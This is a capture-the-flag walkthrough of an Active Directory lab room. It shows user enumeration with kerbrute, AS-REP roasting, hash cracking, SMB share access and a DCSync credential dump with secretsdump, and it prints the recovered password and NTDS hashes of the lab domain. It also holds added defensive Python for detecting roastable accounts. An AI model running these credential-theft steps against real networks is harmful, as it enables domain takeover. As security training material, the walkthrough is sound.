🛠️ Tools used

  • Impacket (GetNPUsers.py, secretsdump.py)
  • Hashcat
  • John

Welcome to Attacktive Directory

We start with enumeration to map the ports and services exposed by the Active Directory network, using nmap and enum4linux.

nmap

nmap <TARGET IP ADDRESS> -p- -sVC -T3

Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-11 21:41 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.49.133.227
Host is up (0.00037s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-11 21:47:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   DNS_Tree_Name: spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2026-03-11T21:49:55+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2026-03-10T21:33:19
|_Not valid after:  2026-09-09T21:33:19
|_ssl-date: 2026-03-11T21:50:09+00:00; -1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49857/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/11%Time=69B1E300%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-11T21:49:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 495.79 seconds

enum4linux

enum4linux-ng -A <TARGET IP ADDRESS> -oA results.txt

ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.49.133.227
[*] Username ......... ''
[*] Random Username .. 'qclcuszt'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 ======================================
|    Listener Scan on 10.49.133.227    |
 ======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    Domain Information via LDAP for 10.49.133.227    |
 =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: spookysec.local

 ============================================================
|    NetBIOS Names and Workgroup/Domain for 10.49.133.227    |
 ============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out

 ==========================================
|    SMB Dialect Check on 10.49.133.227    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true

 ============================================================
|    Domain Information via SMB session for 10.49.133.227    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ATTACKTIVEDIREC
NetBIOS domain name: THM-AD
DNS domain: spookysec.local
FQDN: AttacktiveDirectory.spookysec.local
Derived membership: domain member
Derived domain: THM-AD

 ==========================================
|    RPC Session Check on 10.49.133.227    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 ====================================================
|    Domain Information via RPC for 10.49.133.227    |
 ====================================================
[+] Domain: THM-AD
[+] Domain SID: S-1-5-21-3591857110-2884097990-301047963
[+] Membership: domain member

 ================================================
|    OS Information via RPC for 10.49.133.227    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null

 ======================================
|    Users via RPC on 10.49.133.227    |
 ======================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED

 =======================================
|    Groups via RPC on 10.49.133.227    |
 =======================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED

 =======================================
|    Shares via RPC on 10.49.133.227    |
 =======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user

 ==========================================
|    Policies via RPC for 10.49.133.227    |
 ==========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed

 ==========================================
|    Printers via RPC for 10.49.133.227    |
 ==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED

Completed after 6.22 seconds

What tool will allow us to enumerate port 139/445?

Either nmap or enum4linux-ng can scan both ports, but the answer the room accepts is

  • enum4linux

What is the NetBIOS-Domain Name of the machine?

  • THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

  • .local

Enumerating Users via Kerberos

Use kerbrute to enumerate valid users from the wordlist provided for the room.

https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt

kerbrute userenum --dc <TARGET IP ADDRESS> -d THM-AD userlist.txt


    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/11/26 - Ronnie Flathers @ropnop

2026/03/11 22:25:46 >  Using KDC(s):
2026/03/11 22:25:46 >   10.49.133.227:88

2026/03/11 22:25:46 >  [+] VALID USERNAME:  james@THM-AD
2026/03/11 22:25:46 >  [+] VALID USERNAME:  svc-admin@THM-AD
2026/03/11 22:25:46 >  [+] VALID USERNAME:  James@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  robin@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  darkstar@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  administrator@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  backup@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  paradox@THM-AD
2026/03/11 22:25:48 >  [+] VALID USERNAME:  JAMES@THM-AD
2026/03/11 22:25:48 >  [+] VALID USERNAME:  Robin@THM-AD
2026/03/11 22:25:50 >  [+] VALID USERNAME:  Administrator@THM-AD
2026/03/11 22:25:53 >  [+] VALID USERNAME:  Darkstar@THM-AD
2026/03/11 22:25:55 >  [+] VALID USERNAME:  Paradox@THM-AD
2026/03/11 22:25:58 >  [+] VALID USERNAME:  DARKSTAR@THM-AD
2026/03/11 22:25:59 >  [+] VALID USERNAME:  ori@THM-AD
2026/03/11 22:26:01 >  [+] VALID USERNAME:  ROBIN@THM-AD
2026/03/11 22:26:07 >  Done! Tested 73317 usernames (16 valid) in 20.502 seconds
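kerbrute reports 16 valid usernames, but several are case variants of the same account (james, James, JAMES). The following added example, which is not part of the original writeup or of kerbrute, parses the log lines above and groups them by case-folded name; the embedded log text is a sample constructed from the output shown here.

```python
import re

# Constructed sample: the VALID USERNAME lines from the kerbrute run above, in kerbrute's log format.
KERBRUTE_OUTPUT = """\
2026/03/11 22:25:46 >  Using KDC(s):
2026/03/11 22:25:46 >   10.49.133.227:88

2026/03/11 22:25:46 >  [+] VALID USERNAME:  james@THM-AD
2026/03/11 22:25:46 >  [+] VALID USERNAME:  svc-admin@THM-AD
2026/03/11 22:25:46 >  [+] VALID USERNAME:  James@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  robin@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  darkstar@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  administrator@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  backup@THM-AD
2026/03/11 22:25:47 >  [+] VALID USERNAME:  paradox@THM-AD
2026/03/11 22:25:48 >  [+] VALID USERNAME:  JAMES@THM-AD
2026/03/11 22:25:48 >  [+] VALID USERNAME:  Robin@THM-AD
2026/03/11 22:25:50 >  [+] VALID USERNAME:  Administrator@THM-AD
2026/03/11 22:25:53 >  [+] VALID USERNAME:  Darkstar@THM-AD
2026/03/11 22:25:55 >  [+] VALID USERNAME:  Paradox@THM-AD
2026/03/11 22:25:58 >  [+] VALID USERNAME:  DARKSTAR@THM-AD
2026/03/11 22:25:59 >  [+] VALID USERNAME:  ori@THM-AD
2026/03/11 22:26:01 >  [+] VALID USERNAME:  ROBIN@THM-AD
2026/03/11 22:26:07 >  Done! Tested 73317 usernames (16 valid) in 20.502 seconds
"""

# One "[+] VALID USERNAME:  user@REALM" line.
VALID_RE = re.compile(r"\[\+\] VALID USERNAME:\s+(?P<user>[^@\s]+)@(?P<realm>\S+)")


def parse_valid_users(output: str) -> list[tuple[str, str]]:
    """Return every (username, realm) pair kerbrute reported, in output order."""
    return [(m.group("user"), m.group("realm")) for m in VALID_RE.finditer(output)]


def distinct_accounts(output: str) -> dict[str, list[str]]:
    """Group the reported names by case-folded sAMAccountName.

    Kerberos principal lookups against AD are case-insensitive, so 'james',
    'James' and 'JAMES' are one account; the dict maps the folded name to the
    spellings that were actually sent.
    """
    groups: dict[str, list[str]] = {}
    for user, _realm in parse_valid_users(output):
        spellings = groups.setdefault(user.lower(), [])
        if user not in spellings:
            spellings.append(user)
    return groups


def summarize(output: str) -> dict[str, int]:
    """Count reported hits versus real accounts; the difference is duplicate probes."""
    reported = len(parse_valid_users(output))
    distinct = len(distinct_accounts(output))
    return {"reported": reported, "distinct": distinct, "duplicate_probes": reported - distinct}


if __name__ == "__main__":
    for name, spellings in distinct_accounts(KERBRUTE_OUTPUT).items():
        print(f"{name:<15} {', '.join(spellings)}")
    print(summarize(KERBRUTE_OUTPUT))
```

The 16 hits collapse to 8 accounts. Each probe is an AS-REQ without pre-authentication, so on the domain controller a run like this appears as a burst of Kerberos authentication ticket request events (4768) from one source, most of them failing with client-not-found, which is the signal a detection rule for this enumeration keys on.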

What command within Kerbrute will allow us to enumerate valid usernames?

Running kerbrute --help lists the subcommands and flags kerbrute provides.

  • userenum

What notable account is discovered? (These should jump out at you)

The first account that stands out appears near the top of the kerbrute output.

  • svc-admin

What is the other notable account discovered? (These should jump out at you)

The other account that stands out in the kerbrute output.

  • backup

Abusing Kerberos

We will abuse a Kerberos feature with an attacker technique called ASREPRoasting. ASREPRoasting applies when a user account has the "Does not require Pre-Authentication" setting enabled, meaning the account does not have to prove its identity before the KDC hands out a ticket for that specific account. We will try to obtain Kerberos tickets with GetNPUsers.py for the two interesting users found above, then crack the resulting hash with hashcat or John the Ripper to recover the user's password.

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

  • svc-admin

Trying the backup user first: that account does not have the UF_DONT_REQUIRE_PREAUTH flag set.

python3.9 /opt/impacket/examples/GetNPUsers.py THM-AD/backup -dc-ip <TARGET IP ADDRESS> -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

Then we try the svc-admin user and obtain that user's hash.

python3.9 /opt/impacket/examples/GetNPUsers.py THM-AD/svc-admin -dc-ip <TARGET IP ADDRESS> -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@THM-AD:823ce2010c7e8ed918c01cab7a774803$b883706471b5fffffb39e0a1be2229664cd9776eacb89e89a89ee65b34d5db0f8c29fd01e0fbaf41f9a955f7220eec5c6f78a819895c9fd9826ebd01c790dc55c7ec4850e470b9674487da3adbb61c9f56826af25e48fdbcb9a4a6804d14c8e6ac1b3d3f45d22fdbf7633fd60d8a9ddeac0b36d93eefe77abb23ed016a4b15b7db1be75cd172570da9da0d4a5c8a32d865208b70abe72ba2637908e0a6948fde9fd19a210231c2fbaa5182d3c3ed00fc74dcb9c2f86fc3f37eed7ea972dc8adf1042110f32d8ba3a4581c855064d08ae0195f924e8bd723cba76d3038812a1d54d610a9d2e3a68049a

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

  • Kerberos 5, etype 23, AS-REP

Following the Hashcat Example Hashes wiki page (https://hashcat.net/wiki/doku.php?id=example_hashes), we look up the full name of the hash type obtained from the KDC.

What mode is the hash?

  • 18200

On the same Hashcat Example Hashes wiki page (https://hashcat.net/wiki/doku.php?id=example_hashes), we look up the hash mode for the hash obtained from the KDC.
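The GetNPUsers.py line has a fixed layout: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<encrypted part>, and the etype is what decides the hashcat mode. The added example below (not code from the writeup or from Impacket) parses that layout, maps etype 23 to mode 18200 as the wiki page does, and shows the defender-side check: the userAccountControl bit ADS_UF_DONT_REQUIRE_PREAUTH (0x400000) that makes an account roastable. The hash string and the userAccountControl values are constructed samples; the page never shows the attribute itself.

```python
import re

# userAccountControl bit for "Does not require Kerberos preauthentication"
# (ADS_UF_DONT_REQUIRE_PREAUTH, 0x400000 = 4194304) and the normal-account bit.
UF_DONT_REQUIRE_PREAUTH = 0x400000
UF_NORMAL_ACCOUNT = 0x200

# Encryption type -> hashcat mode, from the hashcat example-hashes page cited
# above; etype 23 (RC4-HMAC) is the one this page uses.
ASREP_HASHCAT_MODE = {23: 18200}

# $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex enc-part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@:$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$"
)

# Constructed sample: same layout as the GetNPUsers.py line above, with a
# made-up checksum and a shortened enc-part (not the real ticket data).
SAMPLE_HASH = (
    "$krb5asrep$23$svc-admin@THM-AD:"
    "00112233445566778899aabbccddeeff$"
    "0123456789abcdef0123456789abcdef0123456789abcdef"
)


def parse_asrep_hash(line: str) -> dict:
    """Split a GetNPUsers.py AS-REP line into its fields and name the hashcat mode."""
    m = ASREP_RE.match(line.strip())
    if m is None:
        raise ValueError("not a $krb5asrep$ hash line")
    etype = int(m.group("etype"))
    return {
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum": bytes.fromhex(m.group("checksum")),  # 16-byte HMAC-MD5 for etype 23
        "enc_part": bytes.fromhex(m.group("enc")),       # RC4-encrypted AS-REP enc-part
        "hashcat_mode": ASREP_HASHCAT_MODE.get(etype),   # None for etypes not in the table
    }


def does_not_require_preauth(uac: int) -> bool:
    """True when the DONT_REQUIRE_PREAUTH bit is set in userAccountControl."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def audit_preauth(accounts: dict[str, int]) -> list[str]:
    """Names of accounts whose userAccountControl allows an AS-REP without preauth."""
    return sorted(name for name, uac in accounts.items() if does_not_require_preauth(uac))


# Constructed userAccountControl values: backup is a plain account,
# svc-admin has the bit set, matching the GetNPUsers.py results above.
SAMPLE_UAC = {
    "backup": UF_NORMAL_ACCOUNT,
    "svc-admin": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH,
}

if __name__ == "__main__":
    h = parse_asrep_hash(SAMPLE_HASH)
    print(f"{h['user']}@{h['realm']} etype={h['etype']} hashcat -m {h['hashcat_mode']}")
    print("preauth not required:", audit_preauth(SAMPLE_UAC))
```

The same bit test is what an LDAP audit runs against the directory with the bitwise-AND matching rule, (userAccountControl:1.2.840.113556.1.4.803:=4194304); clearing the flag on every account that does not genuinely need it removes the condition this whole section depends on. On the KDC side, a roast shows up as a 4768 event whose Pre-Authentication Type is 0 and whose ticket encryption type is 0x17 (RC4).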

Now crack the hash with the modified password list provided. What is the user account's password?

  • management2005

Using hashcat or john, we crack the Kerberos 5, etype 23, AS-REP hash with mode 18200.

Hashcat

hashcat -m 18200 -a 0 hash.txt ~/passwordlist.txt

John

john --wordlist=~/passwordlist.txt --rules hash.txt

Back to the Basics

With the user's credentials in hand we now have more access to the domain controller. We can try to enumerate the shares that may be hosted on it.

What utility can we use to map remote SMB shares?

  • smbclient

The most common tool for connecting to SMB shares is smbclient.

Which option will list shares?

  • -L

To see the arguments smbclient accepts, use the --help argument.

How many remote shares is the server listing?

  • 6

Using the credentials we obtained and the share-listing argument, we find 6 shares visible to the svc-admin user.

smbclient -L //<TARGET IP ADDRESS> -U svc-admin%management2005

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

There is one particular share that we have access to that contains a text file. Which share is it?

  • backup

What is the content of the file?

  • YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Connect to the backup share and download the file inside it; the file contains an encoded string.

smbclient //<TARGET IP ADDRESS>/backup -U svc-admin%management2005

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 20:08:39 2020
  ..                                  D        0  Sat Apr  4 20:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020

  8247551 blocks of size 4096. 4375569 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (6.7 KiloBytes/sec) (average 6.7 KiloBytes/sec)
smb: \> exit
cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

  • backup@spookysec.local:backup2517860

We can decode it directly on the command line with base64 and the -d argument.

cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860

Elevating Privileges within the Domain

We have found the backup account for the Domain Controller. That account has a unique permission that allows all Active Directory changes to be synchronised with it. Knowing this, we use the Impacket tool "secretsdump.py". It retrieves every password hash that the account (being synchronised with the domain controller) can provide. By exploiting this we gain full control over the AD domain.

What method allowed us to dump NTDS.DIT?

  • DRSUAPI

Run secretsdump.py and read the method used to obtain NTDS.DIT secrets from the output.

python3 secretsdump.py THM-AD/backup:backup2517860@<TARGET IP ADDRESS> -dc-ip <TARGET IP ADDRESS>

Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:4355622f195fd8ee38886a202c50e763:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:cbfd2e4db3070240105488df29d951e41c8a2d31e8e196cd51e2f37d6cb2de48
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:e6aa9640812ea17abdb509278ebe14b2
ATTACKTIVEDIREC$:des-cbc-md5:02a445b3522fb094
[*] Cleaning up...

What is the Administrator's NTLM hash?

  • 0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

  • Pass The Hash

With the NTLM protocol we can log in without knowing the user's password, using only the password hash; this method is called Pass The Hash.
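Because the NT hash alone is enough to authenticate, the dump above is worth reading as an audit: any two accounts with the same NT hash share a password, and a hash of the empty password means an account with no password at all. The added example below, which is not code from the writeup or from Impacket, parses the domain\uid:rid:lmhash:nthash::: lines and flags both conditions plus any stored LM hash; the embedded input is a sample assembled from the secretsdump.py output shown on this page.

```python
import re
from collections import defaultdict

# NT hash of the empty password (MD4 of the empty UTF-16LE string).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Value secretsdump prints in the LM field when no LM hash is stored.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# Sample input: a subset of the lines from the secretsdump.py output above
# (raw string, because the account names contain backslashes).
DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
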